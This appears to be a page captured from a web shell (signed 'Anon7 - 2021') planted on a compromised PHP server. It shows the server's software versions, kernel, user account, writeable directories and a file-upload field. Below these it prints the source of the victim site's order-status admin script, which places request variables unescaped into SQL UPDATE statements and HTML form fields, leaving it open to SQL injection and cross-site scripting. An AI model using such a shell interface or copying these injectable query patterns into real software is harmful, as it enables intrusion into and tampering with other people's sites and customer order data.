KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /home/queenjbs/yuchun/admin/Proc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/queenjbs/yuchun/admin/Proc/store_flag_update.php
<?include $_SERVER['DOCUMENT_ROOT']."/conf/conf_dir.php";?>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<?
if($idx && $flag){
	if($flag == 2) $where = " ,d_bank='$date[totime]' ";
	$query = "update shop_order set orderstep ='$flag' $where where uid = '$idx'";
	$result = mysql_query($query, $db_con);

	$query = "update shop_ordergoods set orderstep ='$flag' $where where parent = '$idx'";
	$result = mysql_query($query, $db_con);

}else{
	echo "error idx and flag";
}
?>
<form name="F_bbs" method="post" action="./store_flag_mail.php?idx=<?=$idx?>&mailTo=ok">
<input type="hidden" name="page" value="<?=$page?>">
<input type="hidden" name="act" value="<?=$act?>">
<input type="hidden" name="orderstep" value="<?=$orderstep?>">
<input type="hidden" name="key" value="<?=$key?>">
<input type="hidden" name="key_word" value="<?=$key_word?>">
<input type="hidden" name="goodsproduct" value="<?=$goodsproduct?>">
</form>
<script>document.F_bbs.submit()</script>

Anon7 - 2021